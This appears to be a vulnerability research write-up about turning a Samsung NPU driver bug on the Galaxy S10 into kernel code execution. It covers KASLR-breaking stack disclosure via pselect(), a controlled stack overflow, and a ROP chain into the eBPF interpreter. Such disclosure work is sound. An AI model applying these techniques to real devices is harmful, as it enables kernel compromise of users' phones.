In order to answer this, we really need to understand the constraints of our bug. As discussed above, our primitive is the ability to perform an out-of-bounds addition on a 32-bit unsigned value, adding in the ION buffer's device address (daddr), so long as the original value being modified is less than the ION buffer's size.

The code in npu-session.c performs a copious amount of logging, so it's possible to check the address of the ION allocation from a root shell using the following command:

cat /proc/kmsg | grep ncp_ion_map

In my early tests, the ION buffer's daddr was usually between 0x80500000 and 0x80700000, and always matched the masks 0x80xx0000. If we use a size of 0x4000 for our ION buffer, then that means our primitive will transform a small positive value on the stack into a very large positive (unsigned) or negative (signed) value; for example, we might transform 0x1000 into 0x80611000.

How would we use this to gain code execution? Jann suggested a very interesting trick that could block calls to the functions copy_from_user() and copy_to_user() for arbitrary amounts of time, which could greatly expand the set of block points available during system calls.

copy_from_user() and copy_to_user() are the Linux equivalents of XNU's copyin() and copyout(): They are used to copy memory from userspace into the kernel (copy_from_user()) or to copy memory from the kernel into userspace (copy_to_user()). It's well known that these operations can be blocked by using tricks involving userfaultfd, but this won't be available to us in an exploit from app context. Nevertheless, Jann had discovered that similar tricks could be done using proxy file descriptors (an abstraction over FUSE provided by system_server and vold), essentially allowing page faults on userspace pages to be blocked for arbitrary amounts of time.

One particularly interesting target while blocking a copy_from_user() operation would be copy_from_user() itself. When copy_from_user() performs the actual copy operation in __arch_copy_from_user(), the first access to the magical blocking memory region will trigger a page fault, causing an exception to be delivered and spilling all the registers of __arch_copy_from_user() to the kernel stack while the fault is being processed. During that time, we could come in on another thread using our out-of-bounds addition to increase the size argument to __arch_copy_from_user() where it is spilled onto the stack. That way, once we service the page fault via the proxy file descriptor and allow the exception to return, the modified size value will be popped back into the register and __arch_copy_from_user() will copy more data than expected into kernel memory. If the buffer being copied into lives on the stack, this gives us a deterministic controlled stack buffer overflow that we can use to clobber a return address and get code execution. And the same idea can be applied to copy_to_user() to copy extra memory out of the kernel instead, disclosing kernel stack contents and allowing us to break KASLR and leak the stack cookie.

In order to figure out which spilled register we'd need to target, I looked at __arch_copy_to_user() in IDA. Unfortunately, there's one other complication to make this technique work: due to unrolling, __arch_copy_to_user() will only enter a loop if the size is at least 128 bytes on entry. This means that we'll need to target a syscall that calls copy_to_user() with a size of at least 128 bytes.

Fortunately, it didn't take long to find several good stack disclosure candidates, such as the newuname() syscall:

SYSCALL_DEFINE1(newuname, struct new_utsname __user *, name)

{

    struct new_utsname tmp;

    down_read(&uts_sem);

    memcpy(&tmp, utsname(), sizeof(tmp));

    up_read(&uts_sem);

    if (copy_to_user(name, &tmp, sizeof(tmp)))

        return -EFAULT;

...

}

The new_utsname struct that gets copied out is 0x186 bytes, which means we should enter the looping path in __arch_copy_to_user(). When that access faults, the register containing the copy size 0x186 will be spilled to the stack, and we can change it to a very large value like 0x80610186 before unblocking the fault. To prevent the copyout from running off the end of the kernel stack, we will have the next page in userspace after the magic blocking page be unmapped, causing the __arch_copy_to_user() to terminate early and cleanly.

The write path

The above trick should work for reading past the end of a stack buffer; what about for writing?

Here again I ran into a new complication, and this one was significant: copy_from_user() will zero out any unused space in the buffer that was not successfully copied from userspace:

_copy_from_user(void *to, const void __user *from, unsigned long n)

{

    unsigned long res = n;

    might_fault();

    if (likely(access_ok(VERIFY_READ, from, n))) {

        kasan_check_write(to, n);

        res = raw_copy_from_user(to, from, n);

    }

    if (unlikely(res))

        memset(to + (n - res), 0, res);

    return res;

}

This means that copy_from_user() won't let us truncate the write early as we did with copy_to_user() by having an unmapped page after the blocking region. Instead, it will try to memset the memory past the end of the buffer to zero, all the way up to the modified size of at least 0x80500000. copy_from_user() is out.

Thankfully, there are some calls to the alternative function __copy_from_user(), which does not perform this unwanted memset. But these are much rarer, and thus we'll have a very limited selection of syscalls to target.

In fact, pretty much the only call to __copy_from_user() with a large size that I could find was in restore_fpsimd_context(), reached via the sys_rt_sigreturn() syscall. This syscall seems to be related to signal handling, and in particular restoring user context after returning from a signal handler. This particular __copy_from_user() call is responsible for copying in the floating-point register state (registers Q0 - Q31) after validating the signal frame on the user's stack.

The size parameter at this callsite is 512 (0x200) bytes, which is large enough to enter the looping path in __arch_copy_from_user(). However, the address of the floating point register state that is read from during the copy-in is part of the userspace thread's signal frame on the stack, so it would be very tricky to ensure that both

  1. the first access to the blocking page (which must be part of the thread's stack) is in the target call to __copy_from_user() rather than earlier in the signal frame parsing, and
  2. the address passed to __copy_from_user() is deep enough into the blocking page that we hit a subsequent unmapped page in userspace before overflowing off the end of the kernel stack.

These two requirements are in direct conflict: Since the signal frame before the floating-point register state will be accessed in parse_user_sigframe(), the first requirement effectively means we need to put the floating-point state at the very start of the blocking page, so that the values right before can be accessed without triggering the blocking fault. But at the same time, the second requirement forces us to put the floating-point state towards the end of the blocking page so that we can terminate the __arch_copy_from_user() before running off the end of the kernel stack and triggering a panic. It's impossible to satisfy both of these requirements.

At this point I started looking at alternative ways to use our primitive to work around this conflict. In particular, we know that the __arch_copy_from_user() size parameter on entry will be 0x200, that ION buffers have addresses like 0x80xx0000, and that our addition need not be aligned. So, what if we overlapped only the most-significant byte of the ION address with the least-significant byte of the size parameter?

When __arch_copy_to_user() faults, its registers will be spilled to memory in the order X0, X1, X2, and so on. Register X2 holds the size value, which in our case will be 0x200, and X1 stores the userspace address being copied from. If we assume the first 3 bytes of the userspace address are zero, then we get the following layout of X1 and X2 in memory:

          X1            |           X2

UU UU UU UU UU 00 00 00 | 00 02 00 00 00 00 00 00

Then, if we come in with our unaligned addition with a daddr of 0x80610000:

          X1            |           X2
UU UU UU UU UU
00 00 61 | 80 02 00 00 00 00 00 00

Thus, we've effectively increased the value of X2 from 0x200 to 0x280, which should be large enough to corrupt the stack frame of sys_rt_sigreturn() but small enough to avoid running off the end of the kernel stack.

The consequence of using an unaligned addition like this is that we've also corrupted the value of X1, which stores the userspace address from which to copy in the data. Instead of the upper bytes being all 0, the top byte is now nonzero. Quite fortunately, however, this isn't a problem because the kernel was compiled with support for the Top Byte Ignore (TBI) architectural feature enabled for userspace, which means that the top byte of the pointer will be ignored for the purpose of address translation by the CPU.

This gives us a reasonably complete exploit flow:

  1. Create 2 "blocking pages" using proxy file descriptors.
  2. Map the first blocking page before an unmapped page, and invoke the newuname() syscall with a pointer towards the end of the first blocking page. The copy_to_user() will fault and block, waiting on the corresponding proxy fd.
  3. Use the out-of-bounds addition to increase the spilled value of register X2 from __arch_copy_to_user().
  4. Fulfill the requested data on the first proxy fd, allowing the page fault to complete and resuming __arch_copy_to_user(). The copy-out will proceed past the ends of the stack buffer, disclosing the stack cookie and the return address, but stopping at the unmapped page.
  5. Create a fake signal stack frame around a mapping of the second blocking page and invoke the sys_rt_sigreturn() syscall.
  6. sys_rt_sigreturn() will call __copy_from_user() with size 0x200 and fault trying to access the blocking page.
  7. Use the out-of-bounds addition to increase the spilled value of register X2 from __arch_copy_from_user(), but align the addition such that only the least significant byte of X2 is changed. This will bump the spilled value from 0x200 to 0x280.
  8. Fulfill the requested data on the second proxy fd, allowing the page fault to complete and resuming __arch_copy_from_user(). The copy-in will overflow the stack buffer, overwriting the return address.
  9. When sys_rt_sigreturn() returns, we will gain code execution.

Blocking problems

When I tried to implement this technique, I ran into a fatal problem: I couldn't seem to mmap() the proxy file descriptor in order to create the memory regions that would be used to block copy_to/from_user().

I checked with Jann, and he discovered that the SELinux policy change that would allow mapping the proxy file descriptors was quite recent, and unfortunately too new to be available on my device:

 # For app fuse.

-allow appdomain app_fuse_file:file { getattr read append write };

+allow appdomain app_fuse_file:file { getattr read append write map };

This change was committed in March of 2020, and apparently would not migrate to my device until after the NPU bug I was exploiting would be fixed. Thus, I couldn't rely on blocking copy_to/from_user() after all, and would need to find an alternative target.

Thankfully, due to his copious knowledge of Linux internals, Jann was quickly able to suggest a few different strategies worth investigating. Since this post is already quite long I'll avoid explaining each of them and jump directly to the one that was the most promising: select().

Revisiting the read

Since my previous strategy relied on the blocking memory region for both the stack disclosure (read) and stack buffer overflow (write) steps, I'd need to revisit both of them. But for right now, we'll focus on the read part.

The pselect() system call is an interesting target for our out-of-bounds addition primitive because it will deterministically block before calling copy_to_user() to copy out the contents of a stack buffer. Not only that, but the amount of memory to copy out to userspace is controllable rather than being hardcoded. Thus, we'll have an opportunity to modify the size parameter in a call to copy_to_user() while pselect() is blocked, and increasing the size should cause the kernel to disclose out-of-bounds stack memory.

Here's the relevant code from core_sys_select(), which implements the core logic of the syscall:

int core_sys_select(int n, fd_set __user *inp, fd_set __user *outp,

               fd_set __user *exp, struct timespec64 *end_time)

{

...

    /* Allocate small arguments on the stack to save memory and be faster */

    long stack_fds[SELECT_STACK_ALLOC/sizeof(long)];

...

    /*

     * We need 6 bitmaps (in/out/ex for both incoming and outgoing),

     * since we used fdset we need to allocate memory in units of

     * long-words.

     */

    size = FDS_BYTES(n);

    bits = stack_fds;

    if (size > sizeof(stack_fds) / 6) {

        /* Not enough space in on-stack array; must use kmalloc */

...

        bits = kvmalloc(alloc_size, GFP_KERNEL);

...

    }

    fds.in      = bits;

    fds.out     = bits +   size;

    fds.ex      = bits + 2*size;

    fds.res_in  = bits + 3*size;

    fds.res_out = bits + 4*size;

    fds.res_ex  = bits + 5*size;

    // get_fd_set() calls copy_from_user()

    if ((ret = get_fd_set(n, inp, fds.in)) ||

        (ret = get_fd_set(n, outp, fds.out)) ||

        (ret = get_fd_set(n, exp, fds.ex)))

        goto out;

    zero_fd_set(n, fds.res_in);

    zero_fd_set(n, fds.res_out);

    zero_fd_set(n, fds.res_ex);

    // do_select() may block

    ret = do_select(n, &fds, end_time);

...

    // set_fd_set() calls __copy_to_user()

    if (set_fd_set(n, inp, fds.res_in) ||

        set_fd_set(n, outp, fds.res_out) ||

        set_fd_set(n, exp, fds.res_ex))

        ret = -EFAULT;

...

}

As you can see, the local variable n must be saved to the stack while do_select() blocks, which means that it can be modified before the call to set_fd_set() copies out the corresponding number of bytes to userspace. Also, if n is small, then the 256-byte stack_fds buffer will be used rather than a heap-allocated buffer.

This code actually looks a bit different when compiled in the kernel due to optimization and inlining. In particular, the variable n is not used during the subsequent calls to __arch_copy_to_user(), but rather a hidden variable with the value 8 * size allocated to register X22. Thus, wherever X22 gets spilled to the stack during the prologue of do_select(), that's the address we need to target to change the size passed to __arch_copy_to_user().

But there's one other unfortunate consequence we'll have to deal with when moving from the old "blocking page" technique to this new technique: Before, we were modifying the size to be copied out during the execution of __arch_copy_to_user() itself, after all the sanity checks had passed on the original (unmodified) value. Now, however, we're trying to pass the corrupted value directly to __copy_to_user(), which means we'll need to ensure that we don't trip any of the checks. In particular, __copy_to_user() has a call to check_object_size() which will fail if the copy-out extends beyond the bounds of the stack.

Thankfully, we've already solved this particular problem already when dealing with sys_rt_sigreturn(). Just like in that case, we can set the offset of our out-of-bounds addition such that only the least significant byte of the spilled X22 is modified. But for this to be compatible with the precondition for the write, that the initial value being modified is smaller than the size of the ION buffer, this means that we need the least significant byte of X22 to be 0.

Because core_sys_select() will stop using the stack_fds buffer if n is too large, this constraint actually admits only a single solution: n = 0. That is, we will need to call select() on 0 file descriptors, which will cause the value X22 = 0 to be stored to the stack when do_select() blocks, at which point we can use our out-of-bounds addition to increase X22 to 0x80.

Thankfully, the logic of core_sys_select() functions just fine with n = 0; even better, the stack_fds buffer is only zeroed for positive n, so bumping the copy-out size to 0x80 will allow us to read uninitialized stack buffer contents. So this technique should allow us to turn the out-of-bounds addition into a useful kernel stack disclosure.

Unfortunately, when I began implementing this, I ran into another significant problem. When the prologue of do_select() saves X22 to the stack, it places register X23 right before X22, and X23 contains a kernel pointer at this point. This messes up the precondition for our out-of-bounds addition, because the unaligned value overlapping the least significant byte of X22 will be too large:

          X23           |           X22

XX XX XX XX 80 ff ff ff | 00 00 00 00 00 00 00 00

In order for our precondition to be met, we'd need to have an ION buffer of size at least 0x00ffffff (really, 0x01000000 due to granularity). My impression was that ION memory is quite scarce; is it even possible to allocate an ION buffer that large?

It turns out, yes! I had just assumed that such a large allocation (16 MiB) would fail, but it turns out to work just fine. So, all we have to do is increase the size of the ION buffer initially allocated to 0x1000000, and we should be able to modify register X22.

What about X23, won't that register be corrupted? It will, but thankfully X23 happens to be unused by core_sys_select() after the call to do_select(), so it doesn't actually matter that we clobber it.

At last, we have a viable stack disclosure strategy!

  1. Allocate a 16 MiB ION buffer.
  2. Perform the vmalloc purge using binder fds.
  3. Spray binder vmallocs to consume all vmalloc holes down to size 0x5000, and cause vmalloc() to start allocating from fresh VA space.
  4. Spray thread stacks to fill any remaining 0x5000-byte holes leading up to the fresh VA space.
  5. Map the ION buffer into the fresh VA space by invoking the vulnerable ioctl.
  6. Spray thread stacks; these should land directly after the ION buffer mapping.
  7. Call pselect() from the thread directly after the ION buffer with with n = 0; this call will block for the specified timeout.
  8. Call ioctl() on the main thread to perform the out-of-bounds addition, targeting the value of X22 from core_sys_select(). Align the addition to bump the value from 0 to 0x80.
  9. When do_select() unblocks due to timeout expiry, the modified value of X22 will be passed to __copy_to_user(), disclosing uninitialized kernel stack contents to userspace.

And after a few false starts, this strategy turned out to work perfectly:

Samsung NPU driver exploit

ION 0x80850000 [0x01000000]

Allocated ION buffer

Found victim thread!

buf = 0x74ec863b30

pselect() ret = 0 Success

buf[00]:  0000000000000124

buf[08]:  0000000000000015

buf[10]:  ffffffc88f303b80

buf[18]:  ffffff8088adbdd0

buf[20]:  ffffffc89f935e00

buf[28]:  ffffff8088adbd10

buf[30]:  ffffff8088adbda8

buf[38]:  ffffff8088adbd90

buf[40]:  ffffff8008f814e8

buf[48]:  0000000000000000

buf[50]:  ffffffc800000000

By inspecting the leaked buffer contents, it appears that buf[38] is a stack frame pointer and buf[40] is a return address. Thus we now know both the address of the victim stack, from which we can deduce the address of the ION buffer mapping, and the address of a kernel function, which allows us to break KASLR.

Revisiting the write

Pretty much the only thing left to do is find a way to overflow a stack buffer using our primitive. Once we do this, we should be able to build a ROP chain that will give us some as-yet-unspecified kernel read/write capability.

For now, we won't worry about what to do after the overflow because ROP should be a sufficiently generic technique to implement whatever final read/write capability we want. Admittedly, for an iOS kernel exploit the choice of final capability would have substantial influence on the shape of the exploit flow. But this is because the typical iOS exploit achieves stable kernel read/write before kernel code execution, especially since the arrival of PAC. By contrast, if we can build a stack buffer overflow, we should be able to get ROP execution directly, which is in many ways more powerful than kernel read/write.

Actually, thinking about PAC and iOS gave me an idea.

When a userspace thread enters the kernel, whether due to a system call, page fault, IRQ, or any other reason, the userspace thread's register state needs to be saved in order to be able to resume its execution later. This includes the general-purpose registers X0 - X31 as well as SP, PC, and SPSR ("Saved Program Status Register", alternatively called CPSR or PSTATE). These values get saved to the end of the thread's kernel stack right at the beginning of the exception vector.

When Apple implemented their PAC-based kernel control flow integrity on iOS, they needed to take care that the saved value of SPSR could not be tampered with. The reason is that SPSR is used during exception return to specify the exception level to return to: this could be EL0 when returning to userspace, or EL1 when returning to kernel mode. If SPSR weren't protected, then an attacker with a kernel read/write primitive could modify the saved value of SPSR to cause a thread that would return to userspace (EL0) to instead return to EL1, thereby breaking the kernel's control flow integrity (CFI).

The Samsung Galaxy S10 does not have PAC, and hence SPSR is not protected. This is not a security issue because kernel CFI isn't a security boundary on this device. However, it does mean that this attack could be used to gain kernel code execution.

The idea of targeting the saved SPSR was appealing because we would no longer need the buffer overflow step to execute our ROP payload: assuming we could get an ION buffer allocated with a carefully chosen device address, we could modify SPSR directly using our out-of-bounds addition primitive.

Concretely, when a user thread invokes a syscall, the saved SPSR value might be something like 0x20000000. The least significant 4 bits of SPSR specify the exception level from which the exception was taken: in this case, EL0. A normal kernel thread might have a CPSR value of 0x80400145; in this case, the "5" means that the thread is running at EL1 and on the interrupt stack (SP_EL1).

Now imagine that we could get our 0x01000000-byte ION buffer allocated with a device address of 0x85000000. We'll also assume that we've somehow already managed to set the user thread's saved PC register to a kernel pointer. The saved user PC and SPSR registers look like this on the stack:

          PC            |          SPSR
XX XX XX 0X 80 FF FF FF | 00 00 00 20 00 00 00 00

Using our out-of-bounds addition primitive to change just the least significant byte of SPSR would yield the following:

          PC            |          SPSR
XX XX XX 0X 80
FF FF FF | 85 00 00 20 00 00 00 00

Hence, we would have changed SPSR from 0x20000000 to 0x20000085, meaning that once the syscall returns, we will start executing at EL1!

Of course, that still leaves a few questions open: How do we get our ION buffer allocated at the desired device address? How do we set the saved PC value to a kernel pointer? We'll address these in turn.

Getting the ION buffer allocated at the desired device address seemed the most urgent, since it is quite integral to this technique. In my testing it seemed that ION buffers had decently (but not perfectly) regular allocation patterns. For example, if you had just allocated an ION buffer of size 0x2000 that had device address 0x80500000, then the next ION buffer was usually allocated with device address 0x80610000.

I played around with the available parameters a lot, hoping to discover an underlying logic that would allow me to deterministically predict ION daddrs. For instance, if the size of the first ION allocation was between 0x1000 and 0x10000 bytes, then the next allocation would usually be made at a device address 0x110000 bytes later, while if the first ION allocation was between 0x11000 and 0x20000 bytes, the next allocation would usually be at a device address 0x120000 bytes later. These patterns seemed to suggest that predictability was tantalizingly close; however, try as I might, I couldn't seem to eliminate the variations from the patterns I observed.

Eventually, by sheer random luck I happened to stumble upon a technique during one of my trials that would quite reliably allocate ION buffers at addresses of my choosing. Thus, we can now assume as part of our out-of-bounds addition primitive that we have control to choose the ION buffer's device address. Furthermore, the mask of available ION daddrs using this technique is much larger than I'd initially thought: 0x[89]xxxx000.

Now, as to the question of how we'll set the saved PC value to a kernel pointer: The simplest approach would just be to jump to that address from userspace; this would work to set the value, but it was not clear to me whether we'd be able to block the thread in the kernel in this state long enough to modify the SPSR using our addition primitive from the main thread. Instead, on recommendation from my team I used the ptrace() API, which via the PTRACE_GETREGSET command provides similar functionality to XNU's thread_set_state().

Total meltdown

My first test after implementing this strategy was to set PC to the address of an instruction that would dereference an invalid memory address. The idea was that running this test should cause a kernel panic right away, since the exception return would start running in kernel mode. Then I could check the panic log to see if all the registers were being set as I expected.

Unfortunately, my first test didn't panic: the syscall whose SPSR was corrupted just seemed to hang, never returning to userspace. And after several seconds of this (during which the phone was fully responsive), the phone would eventually reboot with a message about a watchdog timeout.

This seemed quite bizarre to me. If SPSR wasn't being set properly, the syscall should return to EL0, not EL1, and thus we shouldn't be able to cause any sort of kernel crash. On the other hand, I was certain that PC was set to the address of a faulting instruction, so if SPSR were being set properly, I'd expect a kernel panic, not a hard hang triggering a watchdog timeout. What was going on?

Eventually, Jann and I discovered that this device had the ARM64_UNMAP_KERNEL_AT_EL0 CPU feature set, which meant that the faulting instruction I was trying to jump to was being unmapped before the syscall return. Working around this seemed more trouble than it was worth: instead, I decided to abandon SPSR and go back to looking for ways to trigger a stack buffer overflow.

Revisiting the write (again)

So, once again I was back to finding a way to use the out-of-bounds addition to create a stack buffer overflow.

This was the part of the exploit development process that I was least enthusiastic about: searching through the Linux code to find specific patterns that would give me the primitives I needed. Choosing to focus on stack frames rather than heap objects certainly helped narrow the search space, but it's still tedious. Thus, I decided to focus on the parts of the kernel I'd already grown familiar with.

The pattern that I was looking for was any place that blocks before copying data to the stack, where the amount of data to be copied was stored in a variable that would be saved during the block. Ideally, this would be a call to copy_from_user(), but I failed to find any useful instances of copy_from_user() being called after a blocking operation.

However, a horrible, horrible idea occurred to me while looking once again at the pselect() syscall, and in particular at the implementation of do_select():

static int do_select(int n, fd_set_bits *fds, struct timespec64 *end_time)

{

...

    retval = 0;

    for (;;) {

...

        inp = fds->in; outp = fds->out; exp = fds->ex;

        rinp = fds->res_in; routp = fds->res_out; rexp = fds->res_ex;

        for (i = 0; i < n; ++rinp, ++routp, ++rexp) {

...

            in = *inp++; out = *outp++; ex = *exp++;

            all_bits = in | out | ex;

            if (all_bits == 0) {

                i += BITS_PER_LONG;

                continue;

            }

            for (j = 0; j < BITS_PER_LONG; ++j, ++i, bit <<= 1) {

                struct fd f;

                if (i >= n)

                    break;

                if (!(bit & all_bits))

                    continue;

                f = fdget(i);

                if (f.file) {

...

                    if (f_op->poll) {

...

                        mask = (*f_op->poll)(f.file, wait);

                    }

                    fdput(f);

                    if ((mask & POLLIN_SET) && (in & bit)) {

                        res_in |= bit;

                        retval++;

...

                    }

...

                }

            }

            if (res_in)

                *rinp = res_in;

            if (res_out)

                *routp = res_out;

            if (res_ex)

                *rexp = res_ex;

...

        }

...

        if (retval || timed_out || signal_pending(current))

            break;

...

        if (!poll_schedule_timeout(&table, TASK_INTERRUPTIBLE,

                       to, slack))

            timed_out = 1;

    }

...

    return retval;

}

pselect() is able to check file descriptors for 3 types of readiness: reading (in fds), writing (out fds), and exceptional conditions (ex fds). If none of the file descriptors in the 3 fdsets are ready for the corresponding operations, then do_select() will block in poll_schedule_timeout() until either the timeout expires or the status of one of the selected fds changes.

Imagine what happens if, while do_select() is blocked in poll_schedule_timeout(), we use our out-of-bounds addition primitive to change the value of n. We already know from our analysis of core_sys_select() that if n was sufficiently small to begin with, then the stack_fds array will be used instead of allocating a buffer on the heap. Thus, in, out, and ex may reside on the stack. Once poll_schedule_timeout() unblocks, do_select() will iterate over all file descriptor numbers from 0 to (the corrupted value of) n. Towards the end of this loop, inp, outp, and exp will be read out-of-bounds, while rinp, routp, and rexp will be written out of bounds. Thus, this is actually a stack buffer overflow. And since the values written to rinp, routp, and rexp are determined based on the readiness of file descriptors, we have at least some hope of controlling the data that gets written.

Sizing the overflow

So, in theory, we could target pselect() to create a stack buffer overflow using our out-of-bounds addition. There are still a lot of steps between that general idea and a working exploit.

Let's begin just by trying to understand the situation we're in a bit more precisely. Looking at the function prologues in IDA, we can determine the stack layout after the stack_fds buffer:

A diagram showing the call stack of core_sys_select(). The topmost stack frame is core_sys_select(), followed by SyS_pselect6(), followed by el0_sync_64.

The stack layout of core_sys_select() and all earlier frames in the call stack. The 256-byte stack_fds buffer out of which we will overflow is 0x348 bytes from the end of the stack and followed by a stack guard and return address.

There are two major constraints we're going to run into with this buffer overflow: controlling the length of the overflow and controlling the contents of the overflow. We'll start with the length.

Based on the depth of the stack_fds buffer in the kernel stack, we can only write 0x348 bytes into the buffer before running off the end of the stack and triggering a kernel panic. If we assume a maximal value of n = 0x140 (which will be important when controlling the contents of the overflow), then that means we need to stop processing at inp = 0x348 - 5 * 0x28 = 0x280 bytes into the buffer, which will position rexp just off the end of the stack. This corresponds to a maximum corrupted value of n of 8 * 0x280 = 0x1400.

So, how do we choose an ION buffer daddr such that adding the daddr into n = 0x140 at some offset will yield a value significantly greater than 0x140 but less than 0x1400?

Unfortunately, the math on this doesn't work out. Even if we choose from the expanded range of ION device addresses 0x[89]xxxx000, there is no address that can be added to 0x140 at a particular offset to produce a 32-bit value between 0x400 and 0x1400.

Nevertheless, we do still have another option available to us: 2 ION buffers! If we can choose the device address of a single ION buffer, theoretically we should be able to repeat the feat to choose the device addresses of 2 ION buffers together; can we find a pair of daddrs that can be added to 0x140 at particular offsets to produce a 32-bit value between 0x400 and 0x1400?

It turns out that adding in a second independent daddr now gives us enough degrees of freedom to find a solution. For example, consider the daddrs 0x8qrst000 and 0x8wxyz000 being added into 0x140 at offsets 0 and +1, respectively. Looking at how the bytes align, it's clear that the only sum less than 0x1400 will be 0x1140. Thus, we can derive a series of relations between the digits:

carry       11   1

+     00 z0 xy  8w

+  00 t0 rs 8q

   40 01 00 00  00 00 00 00

---------------------------

   40 11 00 00  ??

t = 1

s = 0

z+r = 0 OR z+r = 10

ASSUME z+r = 10

1+y+q = 10 => y+q = f

1+x+8 = 10 => x = 7

In this case, we discover that daddrs 0x8qr01000 and 0x8w7yz000 will be a solution so long as q + y = 0xf and r + z = 0x10. For example, 0x81801000 and 0x827e8000 are a solution:

carry       11   1

+     00 80 7e  82

+  00 10 80 81

   40 01 00 00  00 00 00 00

---------------------------

   40 11 00 00  83

corrupted 32-bit n is 0x1140

So, we'll need to tweak our original heap groom slightly to map both ION buffers back-to-back before spraying the kernel thread stacks.

Controlling the contents

Using 2 ION buffers with carefully chosen device addresses allows us to control the size of the stack buffer overflow. Meanwhile, the contents of the overflow are the output of the pselect() syscall, which we can control because we can control which file descriptors in our process are ready for various types of operations. But once we overflow past the original value of n, we run into a problem: we start reading our input data from the data previously written to the output buffer.

A diagram showing the progression of the stack buffer overflow out of the stack_fds buffer and down the stack.

Corrupting the value of n will cause do_select() to keep processing inp, outp, and exp past their original bounds. Eventually the output cursor rinp will start overflowing out of the stack_fds buffer entirely, overwriting the return address. But before that happens, inp will start consuming the previous output of rinp.

To make the analysis simpler, we can ignore out, ex, rout, and rex to focus exclusively on in and rin. The reason for this is that rout and rex will eventually be overwritten by rin, so it doesn't really matter what they write; if the overflow continues for a sufficient distance, only the output of rin matters.

Using the assumed value of n = 0x140, each of the in, out, ex, rin, rout, rex buffers is 0x28 bytes, so after processing 3 * n = 0x3c0 file descriptors, inp (the input pointer) will start reading from rin (the output buffer), and this will continue as the out-of-bounds write progresses down the stack. By the semantics of select(), each bit in rinp is only written with a 1 if both the corresponding bit in inp was a 1 and the corresponding file descriptor was readable. Thus, once we've written a 0 bit at any location, every bit at a multiple of 0x3c0 bits later will also be 0. This introduces a natural cycle in our overflow that constrains the output.

It's also worth noting that if you look back at do_select(), rinp is only written if the full 64-bit value to write is nonzero. Thus, if any 64-bit output value is 0 (i.e., all 64 fds in the long are either not selected on or not readable), then the corresponding stack location will be left intact.

A diagram showing the cyclical dependency of bit values that can be written using this buffer overflow. In order to set bit X to 1, we need to ensure that bit X - 0x3c0 is also 1 and that file descriptor X - 0x3c0 is readable. If X - 0x3c0 is 0, then do_select() will not select on file descriptor X - 0x3c0, and the output at X will be 0; however, if all 64 output bits in X's long are 0, then no output is written and the value of X will be unchanged.

Because of the 3 * 0x28 = 0x78-byte cycle length, we can treat this primitive as the ability to write up to 15 controlled 64-bit values into the stack, each at a unique offset modulo 0x78, while leaving stack values at the remaining offsets modulo 0x78 intact. This is a conservative simplification, since our primitive is somewhat more flexible than this, but it's useful to visualize our primitive this way.

Under this simplification, we can describe the out-of-bounds write as 15 (offset, value) pairs, where offset is the offset from the start of the stack_fds array in bytes (which must be a multiple of 8 and must be unique mod 0x78) and value is the 64-bit value to be written at that offset. For each (offset, value) pair, we need to set to 1 every bit in each "preimage" of value from an earlier cycle.

To simplify things even further, let's regard the concatenation of the input fdsets in, out, and ex as a single input fdset, just as it appears on the kernel stack in the stack_fds buffer once we've corrupted n.

The simplest solution is to have the "preimage" of each value be value itself, which can be done by setting the portion of the input fdset at offset % 0x78 to value for each (offset, value) pair and by making every file descriptor from 0 to 0x1140 be readable. Since we'll only be selecting on the fds that correspond to 1 bits in value and since every fd is readable, this will mirror the entire input buffer (consisting of the 15 values at their corresponding offsets) down the kernel stack repeatedly. This will trivially ensure that value gets placed at offset because value will be written to every offset in the kernel stack that is the same as offset mod 0x78.

A diagram showing the input buffer being repeatedly mirrored down the stack.

By making all of the first 0x1140 file descriptors readable, the input buffer's 15 longs will be mirrored down the stack, repeating every 0x3c0 bits.

Using a slightly more complicated solution, however, we can limit the depth of the stack corruption. Instead, we'll have the preimage of each value be ~0 (i.e., all 64 bits set), and use the readability of each file descriptor to control the bits that get written. That way, once we've written the value at the correct offset, the fds corresponding to subsequent cycles can be made non-readable, thereby preventing the corruption from continuing down the stack past the desired depth of each write.

This still leaves one more question about the mechanics of the stack buffer overflow: poll_schedule_timeout() will return as soon as any file descriptor becomes readable, so how can we make sure that all the fds for all the 1 bits become readable at the same time? Fortunately this has an easy solution: create 2 pipes, one for all 0 bits and one for all 1 bits, and use dup2() to make all the fds we'll be selecting on be duplicates of the read ends of these pipes. Writing data to the "1 bits" pipe will cause poll_schedule_timeout() to unblock and all the "1 bits" fds will be readable (since they're all dups of the same underlying file). The only thing we need to be careful about is to ensure that at least one of the original in file descriptors (fds 0-0x13f) is a "1 bit" dup, or else poll_schedule_timeout() won't notice the status change when we write to the "1 bits" pipe.

Combining all of these ideas together, we can finally control the contents of the buffer overflow, clobbering the return address (while leaving the stack guard intact!) to execute a small ROP payload.

The ultimate ROP

Finally, it's time to consider our ROP payload. Because we can write at most 15 distinct 64-bit values into the stack via our overflow (2 of which we've already used), we'll need to be careful about keeping the ROP payload small.

When I mentioned this progress to Jann, he suggested that I check the function ___bpf_prog_run(), which he described as the ultimate ROP gadget. And indeed, if your kernel has it compiled in, it does appear to be the ultimate ROP gadget!

___bpf_prog_run() is responsible for interpreting eBPF bytecode that has already been deemed safe by the eBPF verifier. As such, it provides a number very powerful primitives, including:

  1. arbitrary control flow in the eBPF program;
  2. arbitrary memory load;
  3. arbitrary memory store;
  4. arbitrary kernel function calls with up to 5 arguments and a 64-bit return value.

So how can we start executing this function with a controlled instruction array as quickly as possible?

First, it's slightly easier to enter ___bpf_prog_run() through one of its wrappers, such as __bpf_prog_run32(). The wrapper takes just 2 arguments rather than 3, and of those, we only need to control the second:

unsigned int __bpf_prog_run32(const void *ctx, const bpf_insn *insn)

The insn argument is passed in register X1, which means we'll need to find a ROP gadget that will pop a value off the stack and move it into X1. Fortunately, the following gadget from the end of the current_time() function gives us control of X1 indirectly via X20:

FFFFFF8008294C20     LDP     X29, X30, [SP,#0x10+var_s0]

FFFFFF8008294C24     MOV     X0, X19

FFFFFF8008294C28     MOV     X1, X20

FFFFFF8008294C2C     LDP     X20, X19, [SP+0x10+var_10],#0x20

FFFFFF8008294C30     RET

The reason this works is that X20 was actually popped off the stack during the epilogue of core_sys_select(), which means that we already have control over X20 by the time we execute the first hijacked return. So executing this gadget will move the value we popped into X20 over to register X1. And since this gadget reads its return address from the stack, we'll also have control over where we return to next, meaning that we can jump right into __bpf_prog_run32() with our controlled X1.

The only remaining question is what value to place in X1. Fortunately, this also has a very simple answer: the ION buffers are mapped shared between userspace and the kernel, and we already disclosed their location when we leaked the uninitialized stack_fds buffer contents before. Thus, we can just write our eBPF program into the ION buffer and pass that address to __bpf_prog_run32()!

